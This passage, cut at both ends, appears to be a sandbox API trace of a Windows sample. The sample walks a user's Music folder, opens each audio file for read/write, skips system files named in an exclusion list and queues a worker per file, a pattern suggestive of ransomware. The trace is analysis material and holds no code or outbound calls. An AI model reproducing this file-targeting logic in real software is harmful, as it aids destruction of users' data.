(lpFirst="geax6ztsqkfms.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0079.098] StrStrW (lpFirst="geax6ztsqkfms.mp3", lpSrch="thumbs.db") returned 0x0 [0079.098] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 130 [0079.098] QueueUserWorkItem (Function=0x404e00, Context=0x7ec, Flags=0x0) returned 1 [0079.098] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e1f7c00, ftCreationTime.dwHighDateTime=0x1d4cb51, ftLastAccessTime.dwLowDateTime=0x47832e90, ftLastAccessTime.dwHighDateTime=0x1d4d462, ftLastWriteTime.dwLowDateTime=0x47832e90, ftLastWriteTime.dwHighDateTime=0x1d4d462, nFileSizeHigh=0x0, nFileSizeLow=0x186d9, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="Ica7qPAL.wav", cAlternateFileName="")) returned 1 [0079.098] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Ica7qPAL.wav") returned 52 [0079.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Ica7qPAL.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ica7qpal.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7dc [0079.098] StrStrW (lpFirst="ica7qpal.wav", lpSrch="read_me.txt") returned 0x0 [0079.098] StrStrW (lpFirst="ica7qpal.wav", lpSrch="autoexec.bat") returned 0x0 [0079.098] StrStrW (lpFirst="ica7qpal.wav", lpSrch="desktop.ini") returned 0x0 [0079.098] StrStrW (lpFirst="ica7qpal.wav", lpSrch="autorun.inf") returned 0x0 [0079.098] StrStrW (lpFirst="ica7qpal.wav", lpSrch="ntuser.dat") returned 0x0 [0079.098] StrStrW (lpFirst="ica7qpal.wav", lpSrch="iconcache.db") returned 0x0 [0079.098] StrStrW (lpFirst="ica7qpal.wav", lpSrch="bootsect.bak") returned 0x0 [0079.098] StrStrW (lpFirst="ica7qpal.wav", lpSrch="boot.ini") returned 0x0 [0079.098] StrStrW (lpFirst="ica7qpal.wav", lpSrch="ntuser.dat.log") returned 0x0 [0079.098] StrStrW (lpFirst="ica7qpal.wav", lpSrch="thumbs.db") returned 0x0 [0079.098] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 131 [0079.098] QueueUserWorkItem (Function=0x404e00, Context=0x7dc, Flags=0x0) returned 1 [0079.099] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b751e50, ftCreationTime.dwHighDateTime=0x1d4d3a2, ftLastAccessTime.dwLowDateTime=0x3c75f390, ftLastAccessTime.dwHighDateTime=0x1d4d2df, ftLastWriteTime.dwLowDateTime=0x3c75f390, ftLastWriteTime.dwHighDateTime=0x1d4d2df, nFileSizeHigh=0x0, nFileSizeLow=0xc9b0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="it7x9c069hxKE1J.mp3", cAlternateFileName="IT7X9C~1.MP3")) returned 1 [0079.099] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\it7x9c069hxKE1J.mp3") returned 59 [0079.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\it7x9c069hxKE1J.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\it7x9c069hxke1j.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e0 [0079.099] StrStrW (lpFirst="it7x9c069hxke1j.mp3", lpSrch="read_me.txt") returned 0x0 [0079.099] StrStrW (lpFirst="it7x9c069hxke1j.mp3", lpSrch="autoexec.bat") returned 0x0 [0079.099] StrStrW (lpFirst="it7x9c069hxke1j.mp3", lpSrch="desktop.ini") returned 0x0 [0079.099] StrStrW (lpFirst="it7x9c069hxke1j.mp3", lpSrch="autorun.inf") returned 0x0 [0079.099] StrStrW (lpFirst="it7x9c069hxke1j.mp3", lpSrch="ntuser.dat") returned 0x0 [0079.099] StrStrW (lpFirst="it7x9c069hxke1j.mp3", lpSrch="iconcache.db") returned 0x0 [0079.099] StrStrW (lpFirst="it7x9c069hxke1j.mp3", lpSrch="bootsect.bak") returned 0x0 [0079.099] StrStrW (lpFirst="it7x9c069hxke1j.mp3", lpSrch="boot.ini") returned 0x0 [0079.099] StrStrW (lpFirst="it7x9c069hxke1j.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0079.099] StrStrW (lpFirst="it7x9c069hxke1j.mp3", lpSrch="thumbs.db") returned 0x0 [0079.099] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 132 [0079.099] QueueUserWorkItem (Function=0x404e00, Context=0x7e0, Flags=0x0) returned 1 [0079.099] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47c4da20, ftCreationTime.dwHighDateTime=0x1d4d03e, ftLastAccessTime.dwLowDateTime=0x7b417140, ftLastAccessTime.dwHighDateTime=0x1d4d004, ftLastWriteTime.dwLowDateTime=0x7b417140, ftLastWriteTime.dwHighDateTime=0x1d4d004, nFileSizeHigh=0x0, nFileSizeLow=0x1107c, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="k8jbkTBCagM2_1kVS5BO.m4a", cAlternateFileName="K8JBKT~1.M4A")) returned 1 [0079.099] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k8jbkTBCagM2_1kVS5BO.m4a") returned 64 [0079.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k8jbkTBCagM2_1kVS5BO.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k8jbktbcagm2_1kvs5bo.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d4 [0079.099] StrStrW (lpFirst="k8jbktbcagm2_1kvs5bo.m4a", lpSrch="read_me.txt") returned 0x0 [0079.099] StrStrW (lpFirst="k8jbktbcagm2_1kvs5bo.m4a", lpSrch="autoexec.bat") returned 0x0 [0079.099] StrStrW (lpFirst="k8jbktbcagm2_1kvs5bo.m4a", lpSrch="desktop.ini") returned 0x0 [0079.100] StrStrW (lpFirst="k8jbktbcagm2_1kvs5bo.m4a", lpSrch="autorun.inf") returned 0x0 [0079.100] StrStrW (lpFirst="k8jbktbcagm2_1kvs5bo.m4a", lpSrch="ntuser.dat") returned 0x0 [0079.100] StrStrW (lpFirst="k8jbktbcagm2_1kvs5bo.m4a", lpSrch="iconcache.db") returned 0x0 [0079.100] StrStrW (lpFirst="k8jbktbcagm2_1kvs5bo.m4a", lpSrch="bootsect.bak") returned 0x0 [0079.100] StrStrW (lpFirst="k8jbktbcagm2_1kvs5bo.m4a", lpSrch="boot.ini") returned 0x0 [0079.100] StrStrW (lpFirst="k8jbktbcagm2_1kvs5bo.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0079.100] StrStrW (lpFirst="k8jbktbcagm2_1kvs5bo.m4a", lpSrch="thumbs.db") returned 0x0 [0079.100] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 133 [0079.100] QueueUserWorkItem (Function=0x404e00, Context=0x7d4, Flags=0x0) returned 1 [0079.100] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e4118e0, ftCreationTime.dwHighDateTime=0x1d4cafe, ftLastAccessTime.dwLowDateTime=0x8ea05f40, ftLastAccessTime.dwHighDateTime=0x1d4d021, ftLastWriteTime.dwLowDateTime=0x8ea05f40, ftLastWriteTime.dwHighDateTime=0x1d4d021, nFileSizeHigh=0x0, nFileSizeLow=0x2e36, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="KaLWb.wav", cAlternateFileName="")) returned 1 [0079.100] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KaLWb.wav") returned 49 [0079.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KaLWb.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kalwb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d8 [0079.100] StrStrW (lpFirst="kalwb.wav", lpSrch="read_me.txt") returned 0x0 [0079.100] StrStrW (lpFirst="kalwb.wav", lpSrch="autoexec.bat") returned 0x0 [0079.100] StrStrW (lpFirst="kalwb.wav", lpSrch="desktop.ini") returned 0x0 [0079.100] StrStrW (lpFirst="kalwb.wav", lpSrch="autorun.inf") returned 0x0 [0079.100] StrStrW (lpFirst="kalwb.wav", lpSrch="ntuser.dat") returned 0x0 [0079.100] StrStrW (lpFirst="kalwb.wav", lpSrch="iconcache.db") returned 0x0 [0079.100] StrStrW (lpFirst="kalwb.wav", lpSrch="bootsect.bak") returned 0x0 [0079.100] StrStrW (lpFirst="kalwb.wav", lpSrch="boot.ini") returned 0x0 [0079.100] StrStrW (lpFirst="kalwb.wav", lpSrch="ntuser.dat.log") returned 0x0 [0079.101] StrStrW (lpFirst="kalwb.wav", lpSrch="thumbs.db") returned 0x0 [0079.101] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 134 [0079.101] QueueUserWorkItem (Function=0x404e00, Context=0x7d8, Flags=0x0) returned 1 [0079.101] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2f02e00, ftCreationTime.dwHighDateTime=0x1d4cbd9, ftLastAccessTime.dwLowDateTime=0x7164f450, ftLastAccessTime.dwHighDateTime=0x1d4c64d, ftLastWriteTime.dwLowDateTime=0x7164f450, ftLastWriteTime.dwHighDateTime=0x1d4c64d, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="KK9VyR.wav", cAlternateFileName="")) returned 1 [0079.101] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KK9VyR.wav") returned 50 [0079.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KK9VyR.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kk9vyr.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d0 [0079.101] StrStrW (lpFirst="kk9vyr.wav", lpSrch="read_me.txt") returned 0x0 [0079.101] StrStrW (lpFirst="kk9vyr.wav", lpSrch="autoexec.bat") returned 0x0 [0079.101] StrStrW (lpFirst="kk9vyr.wav", lpSrch="desktop.ini") returned 0x0 [0079.101] StrStrW (lpFirst="kk9vyr.wav", lpSrch="autorun.inf") returned 0x0 [0079.101] StrStrW (lpFirst="kk9vyr.wav", lpSrch="ntuser.dat") returned 0x0 [0079.101] StrStrW (lpFirst="kk9vyr.wav", lpSrch="iconcache.db") returned 0x0 [0079.101] StrStrW (lpFirst="kk9vyr.wav", lpSrch="bootsect.bak") returned 0x0 [0079.101] StrStrW (lpFirst="kk9vyr.wav", lpSrch="boot.ini") returned 0x0 [0079.101] StrStrW (lpFirst="kk9vyr.wav", lpSrch="ntuser.dat.log") returned 0x0 [0079.101] StrStrW (lpFirst="kk9vyr.wav", lpSrch="thumbs.db") returned 0x0 [0079.101] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 135 [0079.101] QueueUserWorkItem (Function=0x404e00, Context=0x7d0, Flags=0x0) returned 1 [0079.101] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1733c5a0, ftCreationTime.dwHighDateTime=0x1d4cb53, ftLastAccessTime.dwLowDateTime=0xe2673f50, ftLastAccessTime.dwHighDateTime=0x1d4cf44, ftLastWriteTime.dwLowDateTime=0xe2673f50, ftLastWriteTime.dwHighDateTime=0x1d4cf44, nFileSizeHigh=0x0, nFileSizeLow=0x15a5, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="Mtavn.wav", cAlternateFileName="")) returned 1 [0079.101] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mtavn.wav") returned 49 [0079.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mtavn.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mtavn.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x788 [0079.102] StrStrW (lpFirst="mtavn.wav", lpSrch="read_me.txt") returned 0x0 [0079.102] StrStrW (lpFirst="mtavn.wav", lpSrch="autoexec.bat") returned 0x0 [0079.102] StrStrW (lpFirst="mtavn.wav", lpSrch="desktop.ini") returned 0x0 [0079.102] StrStrW (lpFirst="mtavn.wav", lpSrch="autorun.inf") returned 0x0 [0079.102] StrStrW (lpFirst="mtavn.wav", lpSrch="ntuser.dat") returned 0x0 [0079.102] StrStrW (lpFirst="mtavn.wav", lpSrch="iconcache.db") returned 0x0 [0079.102] StrStrW (lpFirst="mtavn.wav", lpSrch="bootsect.bak") returned 0x0 [0079.102] StrStrW (lpFirst="mtavn.wav", lpSrch="boot.ini") returned 0x0 [0079.102] StrStrW (lpFirst="mtavn.wav", lpSrch="ntuser.dat.log") returned 0x0 [0079.102] StrStrW (lpFirst="mtavn.wav", lpSrch="thumbs.db") returned 0x0 [0079.102] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 136 [0079.102] QueueUserWorkItem (Function=0x404e00, Context=0x788, Flags=0x0) returned 1 [0079.102] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab285300, ftCreationTime.dwHighDateTime=0x1d4cf10, ftLastAccessTime.dwLowDateTime=0x5303f7b0, ftLastAccessTime.dwHighDateTime=0x1d4c696, ftLastWriteTime.dwLowDateTime=0x5303f7b0, ftLastWriteTime.dwHighDateTime=0x1d4c696, nFileSizeHigh=0x0, nFileSizeLow=0x14086, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="nA3dq_ckpXLTrH.m4a", cAlternateFileName="NA3DQ_~1.M4A")) returned 1 [0079.102] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nA3dq_ckpXLTrH.m4a") returned 58 [0079.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nA3dq_ckpXLTrH.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\na3dq_ckpxltrh.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7cc [0079.102] StrStrW (lpFirst="na3dq_ckpxltrh.m4a", lpSrch="read_me.txt") returned 0x0 [0079.102] StrStrW (lpFirst="na3dq_ckpxltrh.m4a", lpSrch="autoexec.bat") returned 0x0 [0079.102] StrStrW (lpFirst="na3dq_ckpxltrh.m4a", lpSrch="desktop.ini") returned 0x0 [0079.102] StrStrW (lpFirst="na3dq_ckpxltrh.m4a", lpSrch="autorun.inf") returned 0x0 [0079.102] StrStrW (lpFirst="na3dq_ckpxltrh.m4a", lpSrch="ntuser.dat") returned 0x0 [0079.102] StrStrW (lpFirst="na3dq_ckpxltrh.m4a", lpSrch="iconcache.db") returned 0x0 [0079.102] StrStrW (lpFirst="na3dq_ckpxltrh.m4a", lpSrch="bootsect.bak") returned 0x0 [0079.103] StrStrW (lpFirst="na3dq_ckpxltrh.m4a", lpSrch="boot.ini") returned 0x0 [0079.103] StrStrW (lpFirst="na3dq_ckpxltrh.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0079.103] StrStrW (lpFirst="na3dq_ckpxltrh.m4a", lpSrch="thumbs.db") returned 0x0 [0079.103] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 137 [0079.103] QueueUserWorkItem (Function=0x404e00, Context=0x7cc, Flags=0x0) returned 1 [0079.103] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aab1eb0, ftCreationTime.dwHighDateTime=0x1d4c6d0, ftLastAccessTime.dwLowDateTime=0x9c2d7cf0, ftLastAccessTime.dwHighDateTime=0x1d4d2d9, ftLastWriteTime.dwLowDateTime=0x9c2d7cf0, ftLastWriteTime.dwHighDateTime=0x1d4d2d9, nFileSizeHigh=0x0, nFileSizeLow=0xf0b5, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="nY38mU naavb.wav", cAlternateFileName="NY38MU~1.WAV")) returned 1 [0079.103] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nY38mU naavb.wav") returned 56 [0079.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nY38mU naavb.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ny38mu naavb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78c [0079.103] StrStrW (lpFirst="ny38mu naavb.wav", lpSrch="read_me.txt") returned 0x0 [0079.103] StrStrW (lpFirst="ny38mu naavb.wav", lpSrch="autoexec.bat") returned 0x0 [0079.103] StrStrW (lpFirst="ny38mu naavb.wav", lpSrch="desktop.ini") returned 0x0 [0079.103] StrStrW (lpFirst="ny38mu naavb.wav", lpSrch="autorun.inf") returned 0x0 [0079.103] StrStrW (lpFirst="ny38mu naavb.wav", lpSrch="ntuser.dat") returned 0x0 [0079.103] StrStrW (lpFirst="ny38mu naavb.wav", lpSrch="iconcache.db") returned 0x0 [0079.103] StrStrW (lpFirst="ny38mu naavb.wav", lpSrch="bootsect.bak") returned 0x0 [0079.103] StrStrW (lpFirst="ny38mu naavb.wav", lpSrch="boot.ini") returned 0x0 [0079.103] StrStrW (lpFirst="ny38mu naavb.wav", lpSrch="ntuser.dat.log") returned 0x0 [0079.103] StrStrW (lpFirst="ny38mu naavb.wav", lpSrch="thumbs.db") returned 0x0 [0079.103] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 138 [0079.103] QueueUserWorkItem (Function=0x404e00, Context=0x78c, Flags=0x0) returned 1 [0079.103] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc49beed0, ftCreationTime.dwHighDateTime=0x1d4c5d0, ftLastAccessTime.dwLowDateTime=0x95d70e80, ftLastAccessTime.dwHighDateTime=0x1d4d0ee, ftLastWriteTime.dwLowDateTime=0x95d70e80, ftLastWriteTime.dwHighDateTime=0x1d4d0ee, nFileSizeHigh=0x0, nFileSizeLow=0xc04b, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="pEGEd-QnUZ2Rr2dF32C9.wav", cAlternateFileName="PEGED-~1.WAV")) returned 1 [0079.103] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pEGEd-QnUZ2Rr2dF32C9.wav") returned 64 [0079.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pEGEd-QnUZ2Rr2dF32C9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\peged-qnuz2rr2df32c9.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0079.104] StrStrW (lpFirst="peged-qnuz2rr2df32c9.wav", lpSrch="read_me.txt") returned 0x0 [0079.104] StrStrW (lpFirst="peged-qnuz2rr2df32c9.wav", lpSrch="autoexec.bat") returned 0x0 [0079.104] StrStrW (lpFirst="peged-qnuz2rr2df32c9.wav", lpSrch="desktop.ini") returned 0x0 [0079.104] StrStrW (lpFirst="peged-qnuz2rr2df32c9.wav", lpSrch="autorun.inf") returned 0x0 [0079.104] StrStrW (lpFirst="peged-qnuz2rr2df32c9.wav", lpSrch="ntuser.dat") returned 0x0 [0079.104] StrStrW (lpFirst="peged-qnuz2rr2df32c9.wav", lpSrch="iconcache.db") returned 0x0 [0079.104] StrStrW (lpFirst="peged-qnuz2rr2df32c9.wav", lpSrch="bootsect.bak") returned 0x0 [0079.104] StrStrW (lpFirst="peged-qnuz2rr2df32c9.wav", lpSrch="boot.ini") returned 0x0 [0079.104] StrStrW (lpFirst="peged-qnuz2rr2df32c9.wav", lpSrch="ntuser.dat.log") returned 0x0 [0079.104] StrStrW (lpFirst="peged-qnuz2rr2df32c9.wav", lpSrch="thumbs.db") returned 0x0 [0079.104] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 139 [0079.104] QueueUserWorkItem (Function=0x404e00, Context=0x7a0, Flags=0x0) returned 1 [0079.104] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dfe61c0, ftCreationTime.dwHighDateTime=0x1d4c67d, ftLastAccessTime.dwLowDateTime=0x5962b450, ftLastAccessTime.dwHighDateTime=0x1d4d165, ftLastWriteTime.dwLowDateTime=0x5962b450, ftLastWriteTime.dwHighDateTime=0x1d4d165, nFileSizeHigh=0x0, nFileSizeLow=0x17ff9, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="PfZGb5zCdvuKna9f.m4a", cAlternateFileName="PFZGB5~1.M4A")) returned 1 [0079.104] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PfZGb5zCdvuKna9f.m4a") returned 60 [0079.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PfZGb5zCdvuKna9f.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pfzgb5zcdvukna9f.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x79c [0079.104] StrStrW (lpFirst="pfzgb5zcdvukna9f.m4a", lpSrch="read_me.txt") returned 0x0 [0079.104] StrStrW (lpFirst="pfzgb5zcdvukna9f.m4a", lpSrch="autoexec.bat") returned 0x0 [0079.104] StrStrW (lpFirst="pfzgb5zcdvukna9f.m4a", lpSrch="desktop.ini") returned 0x0 [0079.104] StrStrW (lpFirst="pfzgb5zcdvukna9f.m4a", lpSrch="autorun.inf") returned 0x0 [0079.104] StrStrW (lpFirst="pfzgb5zcdvukna9f.m4a", lpSrch="ntuser.dat") returned 0x0 [0079.105] StrStrW (lpFirst="pfzgb5zcdvukna9f.m4a", lpSrch="iconcache.db") returned 0x0 [0079.105] StrStrW (lpFirst="pfzgb5zcdvukna9f.m4a", lpSrch="bootsect.bak") returned 0x0 [0079.105] StrStrW (lpFirst="pfzgb5zcdvukna9f.m4a", lpSrch="boot.ini") returned 0x0 [0079.105] StrStrW (lpFirst="pfzgb5zcdvukna9f.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0079.105] StrStrW (lpFirst="pfzgb5zcdvukna9f.m4a", lpSrch="thumbs.db") returned 0x0 [0079.105] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 140 [0079.105] QueueUserWorkItem (Function=0x404e00, Context=0x79c, Flags=0x0) returned 1 [0079.105] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0f8e20, ftCreationTime.dwHighDateTime=0x1d4cdca, ftLastAccessTime.dwLowDateTime=0xedc845e0, ftLastAccessTime.dwHighDateTime=0x1d4cb04, ftLastWriteTime.dwLowDateTime=0xedc845e0, ftLastWriteTime.dwHighDateTime=0x1d4cb04, nFileSizeHigh=0x0, nFileSizeLow=0x101e7, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="qdciIs4j5R4.mp3", cAlternateFileName="QDCIIS~1.MP3")) returned 1 [0079.105] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qdciIs4j5R4.mp3") returned 55 [0079.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qdciIs4j5R4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qdciis4j5r4.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x798 [0079.105] StrStrW (lpFirst="qdciis4j5r4.mp3", lpSrch="read_me.txt") returned 0x0 [0079.105] StrStrW (lpFirst="qdciis4j5r4.mp3", lpSrch="autoexec.bat") returned 0x0 [0079.105] StrStrW (lpFirst="qdciis4j5r4.mp3", lpSrch="desktop.ini") returned 0x0 [0079.105] StrStrW (lpFirst="qdciis4j5r4.mp3", lpSrch="autorun.inf") returned 0x0 [0079.105] StrStrW (lpFirst="qdciis4j5r4.mp3", lpSrch="ntuser.dat") returned 0x0 [0079.105] StrStrW (lpFirst="qdciis4j5r4.mp3", lpSrch="iconcache.db") returned 0x0 [0079.105] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 141 [0079.105] QueueUserWorkItem (Function=0x404e00, Context=0x798, Flags=0x0) returned 1 [0079.105] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2644050, ftCreationTime.dwHighDateTime=0x1d4c61c, ftLastAccessTime.dwLowDateTime=0x97e63bf0, ftLastAccessTime.dwHighDateTime=0x1d4d24d, ftLastWriteTime.dwLowDateTime=0x97e63bf0, ftLastWriteTime.dwHighDateTime=0x1d4d24d, nFileSizeHigh=0x0, nFileSizeLow=0xb3fa, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="qT 14mSyGVx8n5-.m4a", cAlternateFileName="QT14MS~1.M4A")) returned 1 [0079.105] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qT 14mSyGVx8n5-.m4a") returned 59 [0079.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qT 14mSyGVx8n5-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qt 14msygvx8n5-.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c8 [0079.106] QueueUserWorkItem (Function=0x404e00, Context=0x7c8, Flags=0x0) returned 